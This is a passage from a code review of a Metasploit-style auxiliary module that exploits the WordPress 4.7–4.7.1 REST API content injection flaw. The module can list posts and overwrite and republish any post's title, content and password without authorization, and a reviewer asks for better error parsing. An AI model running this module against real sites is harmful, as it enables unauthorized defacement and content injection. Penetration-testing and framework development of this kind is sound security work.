modules/auxiliary/scanner/http/wordpress_content_injection.rb

```diff
@@ -0,0 +1,226 @@
+        ['URL',   'https://developer.wordpress.org/rest-api/reference/posts/']
+      ],
+      'DisclosureDate' => 'Feb 1 2017',
+      'License'        => MSF_LICENSE,
+      'Actions'        => [
+        ['LIST',   'Description' => 'List posts'],
+        ['UPDATE', 'Description' => 'Update post']
+      ],
+      'DefaultAction'  => 'LIST'
+    ))
+
+    register_options([
+      OptInt.new('POST_ID',          [false, 'Post ID (0 for all)', 0]),
+      OptString.new('POST_TITLE',    [false, 'Post title']),
+      OptString.new('POST_CONTENT',  [false, 'Post content']),
+      OptString.new('POST_PASSWORD', [false, 'Post password (\'\' for none)'])
+    ])
+
+    register_advanced_options([
+      OptInt.new('PostCount',     [false, 'Number of posts to list', 100]),
+      OptString.new('SearchTerm', [false, 'Search term when listing posts']),
+      OptBool.new('AutoPublish',  [false, 'Publish updated posts', true])
+    ])
+  end
+
+  def check_host(_ip)
+    if (version = wordpress_version)
+      version = Gem::Version.new(version)
+    else
+      return Exploit::CheckCode::Safe
+    end
+
+    vprint_status("WordPress #{version}: #{full_uri}")
+
+    if version.between?(Gem::Version.new('4.7'), Gem::Version.new('4.7.1'))
+      Exploit::CheckCode::Appears
+    else
+      Exploit::CheckCode::Detected
+    end
+  end
+
+  def run_host(_ip)
+    case action.name
+    when 'LIST'
+      do_list
+    when 'UPDATE'
+      do_update
+    end
+  end
+
+  def do_list
+    posts_to_list = list_posts
+
+    if posts_to_list.empty?
+      vprint_status("No posts found at #{full_uri}")
+      return
+    end
+
+    tbl = Rex::Text::Table.new(
+      'Header'  => "Posts at #{full_uri} (REST API: #{get_rest_api})",
+      'Columns' => %w{ID Title URL Status Password}
+    )
+
+    posts_to_list.each do |post|
+      if post[:status] == 'publish'
+        status = 'Published'
+      else
+        status = post[:status].capitalize
+      end
+
+      tbl << [
+        post[:id],
+        Rex::Text.html_decode(post[:title]),
+        post[:url],
+        status,
+        post[:password] ? 'Yes' : 'No'
+      ]
+    end
+
+    print_line(tbl.to_s)
+  end
+
+  def do_update
+    posts_to_update = []
+
+    if datastore['POST_ID'] == 0
+      posts_to_update = list_posts
+    else
+      posts_to_update << {id: datastore['POST_ID']}
+    end
+
+    if posts_to_update.empty?
+      vprint_status("No posts to update at #{full_uri}")
+      return
+    end
+
+    posts_to_update.each do |post|
+      res = update_post(post[:id],
+        title:    datastore['POST_TITLE'],
+        content:  datastore['POST_CONTENT'],
+        password: datastore['POST_PASSWORD'],
+        status:   datastore['AutoPublish'] ? 'publish' : nil
+      )
+
+      post_url = full_uri(wordpress_url_post(post[:id]))
+
+      if res && res.code == 200
+        print_good("SUCCESS: #{post_url} (post updated)")
+      elsif res && res.code == 404
```

Comment:
Can we also parse the exact error message? So parse the json and if the message property exist, print it:
```
"code":"rest_cannot_publish","message":"Sorry, you are not allowed to publish posts in this post type."
```